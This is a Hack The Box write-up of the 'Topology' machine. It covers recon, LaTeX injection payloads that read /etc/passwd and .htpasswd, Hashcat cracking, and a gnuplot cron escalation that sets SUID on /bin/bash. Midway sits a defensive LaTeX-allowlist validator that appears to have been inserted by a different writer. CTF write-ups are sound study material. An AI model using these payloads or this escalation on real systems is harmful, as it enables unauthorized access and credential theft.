The Be Sure Blog

Topology: Use LaTeX Injection and Hashcat

posted on 17.8.2023 by Below Surface in "Hack The Box"

sudo nmap -sCV 10.10.11.217

Reveals:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_  256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Since port 80 is open and we get an HTTP title, let's paste the IP into our browser. A website loads. From the displayed email addresses we see that the URL should be

topology.htb

Let's add this to our local hosts file:

sudo nano /etc/hosts

Add:

10.10.11.217 topology.htb

Then save and exit the editor.

When we view the page content further, we discover a link to a PHP page:

http://latex.topology.htb/equation.php

But the link does not work yet; we also need to put it into our hosts file with the server's IP address:

10.10.11.217 latex.topology.htb

Now it works!

We can use GoBuster to find more subdomains:

sudo gobuster vhost -u http://topology.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

Output:

Found: dev.topology.htb Status: 401 [Size: 463]
Found: stats.topology.htb Status: 200 [Size: 108]

Add them to the hosts file, as we did before.

Also, let's search for pages and directories:

gobuster dir --url http://10.10.11.217 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php

Output:

/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/images               (Status: 301) [Size: 313] [--> http://10.10.11.217/images/]
/index.html           (Status: 200) [Size: 6767]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.217/css/]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.11.217/javascript/]
/portraits            (Status: 301) [Size: 316] [--> http://10.10.11.217/portraits/]

Let's focus on the equation.php page now. We can provide some input and the website will generate an image from it. This can be exploited, because the LaTeX we submit is compiled on the server, so injected LaTeX commands run there (see the hacktricks link below for more information about this exploit). The following command will output an image of the passwd file of the target system:

$\lstinputlisting{/etc/passwd}$
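On the defending side, the fix for an endpoint like equation.php is to accept only a known set of math macros rather than trying to blocklist dangerous ones. The following Python check is an added example, not code from the post or from the box: the allowlist contents and the validate_equation name are my own choices, and the payload it rejects is the one shown above.

```python
import re

# Macros a math-only renderer reasonably needs; anything not listed is refused.
# This allowlist is my own illustrative choice, not taken from the box's equation.php.
ALLOWED_MACROS = {
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times", "pm",
    "alpha", "beta", "gamma", "theta", "pi", "sigma", "omega", "partial", "nabla",
    "left", "right", "mathbb", "mathrm", "mathcal", "sin", "cos", "tan", "log", "ln",
    "exp", "to", "leq", "geq", "neq", "approx",
}
# Single characters that may follow a backslash (escaped braces, spacing, line break)
ALLOWED_ESCAPES = set("{}$&#_% ,;:!\\")
MACRO_RE = re.compile(r"\\([A-Za-z]+|.)", re.DOTALL)

def validate_equation(src: str, max_len: int = 500) -> tuple[bool, str]:
    """Return (accepted, reason). Allowlist, not denylist: TeX can build macro
    names at run time, so refusing a list of known-bad names is not enough."""
    if len(src) > max_len:
        return False, "input too long"
    # ^^xx lets a caller spell any character code, including a backslash
    if "^^" in src:
        return False, "^^ escapes not allowed"
    for m in MACRO_RE.finditer(src):
        name = m.group(1)
        if name.isalpha():
            if name not in ALLOWED_MACROS:
                return False, f"macro \\{name} not allowed"
        elif name not in ALLOWED_ESCAPES:
            return False, f"escape \\{name} not allowed"
    if src.count("{") != src.count("}"):
        return False, "unbalanced braces"
    return True, "ok"
```

The more robust option is to never hand raw user input to a full TeX engine at all, for example by rendering a restricted math subset with a dedicated library instead.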

However, there are no credentials included. From our previous research, we also know the URL:

dev.topology.htb

So, let's see if we can grab anything from there.

$\lstinputlisting{/var/www/dev/.htpasswd}$

This command outputs:

vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

This is a user name together with their password hash. ChatGPT tells us that this is an Apache-specific "MD5 apr1" password hash, with the format:

$apr1$salt$hashed_password

  • apr1 indicates the algorithm used (Apache's MD5-based algorithm).
  • salt is the randomly generated salt used in the hashing process.
  • hashed_password is the actual hashed password.

Let's crack that with Hashcat. Find a table for the hash mode (-m) here: https://hashcat.net/wiki/doku.php?id=example_hashes.

hashcat -m 1600 -a 0 '$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0' /usr/share/wordlists/rockyou.txt

Relevant output:

$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0:calculus20   
Status...........: Cracked

Our login data will now be used to SSH into the server:

ssh vdaisley@10.10.11.217
password: calculus20

Success!

cat user.txt


Time for privilege escalation.

whoami
vdaisley

We will use SCP to upload a tool called "pspy" from our local machine, which we downloaded from: https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64. Create a new folder called temp, then exit the SSH connection and upload the pspy64 file with SCP:

mkdir temp
exit
scp Downloads/pspy64 vdaisley@10.10.11.217:~/temp
password: calculus20
ssh vdaisley@10.10.11.217
cd temp
chmod +x pspy64
./pspy64

Now we can see running processes with our limited privileges. Just wait a while for pspy to gather information on the running events. One thing that regularly pops up is /opt/gnuplot.

2023/08/17 04:46:01 CMD: UID=0     PID=5416   | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} ;

We see that gnuplot will execute any .plt files as root, so this is what we will try to exploit now. Our goal is to get a root shell with our privilege escalation.

nano /opt/gnuplot/escalation.plt

Insert:

system "chmod u+s /bin/bash"

Then save and exit the editor. When monitoring the system processes with pspy again, we see that our file escalation.plt gets executed!

2023/08/17 04:59:01 CMD: UID=0     PID=5749   | gnuplot /opt/gnuplot/escalation.plt

Which means, we can now do the final step of privilege escalation:

/bin/bash -p
whoami
-> root

Then we search for the root.txt file:

find / -name root.txt 2>/dev/null
cat /root/root.txt

Finished!

Tags:

hack the box
latex injection
hashcat
hash cracking
password recovery
privilege escalation

Sources:

https://app.hackthebox.com/machines/Topology
https://medium.com/@error.not.known.404/topology-easy-ctf-hackthebox-99b485c380dc
https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection
https://hashcat.net/wiki/doku.php?id=example_hashes
